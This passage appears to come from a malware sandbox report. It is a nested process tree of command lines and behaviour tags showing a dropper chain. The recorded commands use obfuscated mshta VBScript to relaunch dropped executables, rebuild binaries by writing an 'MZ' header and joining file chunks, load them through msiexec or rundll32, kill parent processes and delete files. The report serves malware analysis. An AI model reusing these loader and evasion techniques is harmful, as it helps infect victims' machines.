                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:5140
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "yvOD7s1YY7vumSvLAp_y5L3t.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\yvOD7s1YY7vumSvLAp_y5L3t.exe" & exit
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                        PID:5548
                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                          taskkill /im "yvOD7s1YY7vumSvLAp_y5L3t.exe" /f
                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                          PID:7844
                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\zHbdWbgp0ZSJfbXE_yNV5v8v.exe
                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\zHbdWbgp0ZSJfbXE_yNV5v8v.exe"
                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:5868
                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\zHbdWbgp0ZSJfbXE_yNV5v8v.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\zHbdWbgp0ZSJfbXE_yNV5v8v.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                          PID:6388
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\zHbdWbgp0ZSJfbXE_yNV5v8v.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\zHbdWbgp0ZSJfbXE_yNV5v8v.exe" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                              PID:6984
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
                                                                                                                                                                                                                8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                  PID:6904
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                      PID:4328
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                          PID:7028
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )
                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                          PID:5920
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                              PID:6348
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                  PID:5764
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                    PID:7104
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                    msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                    PID:3040
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                              taskkill -im "zHbdWbgp0ZSJfbXE_yNV5v8v.exe" -F
                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                              PID:7396
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Wed09c4c0c3d01.exe
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                    PID:1072
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed09c4c0c3d01.exe
                                                                                                                                                                                                                      Wed09c4c0c3d01.exe
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                      PID:820
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\911997.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\911997.exe"
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                        PID:900
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\510197.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\510197.exe"
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                        PID:4192
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\8314423.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\8314423.exe"
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                        PID:4452
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\3059647.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\3059647.exe"
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                          PID:4660
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL" ). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Roaming\3059647.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Roaming\3059647.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ) )
                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                              PID:4408
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Roaming\3059647.exe" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Roaming\3059647.exe" ) do taskkill -f -Im "%~NXZ"
                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                  PID:4608
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe
                                                                                                                                                                                                                                    ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i
                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    PID:6084
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL" ). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ) )
                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                        PID:6908
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"
                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                            PID:6400
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VBSCRipT: CLOse ( createoBJECt ( "wScRIpt.shelL" ). RUn ("cMd /C EChO | SEt /p = ""MZ"" > CPkPI.i & CopY /b /Y CPkpI.I + sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q * " , 0 ,tRue ) )
                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                            PID:7696
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C EChO | SEt /p = "MZ" > CPkPI.i & CopY /b /Y CPkpI.I + sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q *
                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                PID:7996
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" EChO "
                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                  PID:1928
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>CPkPI.i"
                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                    PID:7936
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                                                                                    control ..\WfNRfms4.K
                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                      PID:5336
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\WfNRfms4.K
                                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                                          PID:5516
                                                                                                                                                                                                                                                          • C:\Windows\system32\RunDll32.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\WfNRfms4.K
                                                                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                                                                              PID:5520
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\WfNRfms4.K
                                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                                  PID:1472
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                      taskkill -f -Im "3059647.exe"
                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                      PID:5152
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\4187459.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\4187459.exe"
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                PID:4844
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  PID:4976
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\432611.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\432611.exe"
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                PID:4968
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Wed09d761ab4704dd931.exe
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                              PID:1248
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed09d761ab4704dd931.exe
                                                                                                                                                                                                                                                Wed09d761ab4704dd931.exe
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                PID:1636
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Wed0968d19e5ec37794.exe
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                PID:688
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed0968d19e5ec37794.exe
                                                                                                                                                                                                                                                  Wed0968d19e5ec37794.exe
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  PID:1928
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed0968d19e5ec37794.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed0968d19e5ec37794.exe
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:3620
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Wed09f69eef9c0d5b.exe
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:1208
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed09f69eef9c0d5b.exe
                                                                                                                                                                                                                                                    Wed09f69eef9c0d5b.exe
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:1352
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-281RQ.tmp\Wed09f69eef9c0d5b.tmp
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-281RQ.tmp\Wed09f69eef9c0d5b.tmp" /SL5="$301C8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed09f69eef9c0d5b.exe"
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                      PID:2420
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Wed0983917533e.exe
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                    PID:1976
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed0983917533e.exe
                                                                                                                                                                                                                                                      Wed0983917533e.exe
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                      PID:2056
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Wed090db89ca4c58.exe
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                    PID:1584
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed090db89ca4c58.exe
                                                                                                                                                                                                                                                      Wed090db89ca4c58.exe
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      PID:1244
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed090db89ca4c58.exe"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed090db89ca4c58.exe"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                          PID:2684
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed090db89ca4c58.exe" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed090db89ca4c58.exe" ) do taskkill /f -IM "%~nXN"
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                              PID:2424
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE
                                                                                                                                                                                                                                                                ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA
                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                PID:4520
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )
                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                    PID:4612
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"
                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                        PID:2348
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct ( "wSCRIPT.SHEll" ). RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W " , 0 , True ) )
                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                        PID:6108
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81 &CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W
                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                            PID:6800
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" eChO "
                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                PID:4852
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"
                                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                                  PID:6924
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                  msiexec /y ..\_enU.W
                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                  PID:7544
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                            taskkill /f -IM "Wed090db89ca4c58.exe"
                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                            PID:4376
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Wed0944361c3621a67a6.exe
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                    PID:588
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed0944361c3621a67a6.exe
                                                                                                                                                                                                                                                                      Wed0944361c3621a67a6.exe
                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      PID:64
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Wed09755e77ed017e8af.exe
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:884
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed09755e77ed017e8af.exe
                                                                                                                                                                                                                                                                        Wed09755e77ed017e8af.exe
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                        PID:3144
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed09755e77ed017e8af.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed09755e77ed017e8af.exe
                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          PID:3284
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Wed09fbe3bf81.exe
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:1316
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed09fbe3bf81.exe
                                                                                                                                                                                                                                                                          Wed09fbe3bf81.exe
                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          PID:3040
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed09fbe3bf81.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed09fbe3bf81.exe
                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:1168
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Wed091bab77a3bb62d.exe
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                          PID:1372
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed091bab77a3bb62d.exe
                                                                                                                                                                                                                                                                            Wed091bab77a3bb62d.exe
                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:2360
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 1568
                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                              PID:2140
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 508
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                          PID:660
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mstsc.exe
                                                                                                                                                                                                                                                                    "C:\Windows\SysWOW64\mstsc.exe"
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                    PID:4696
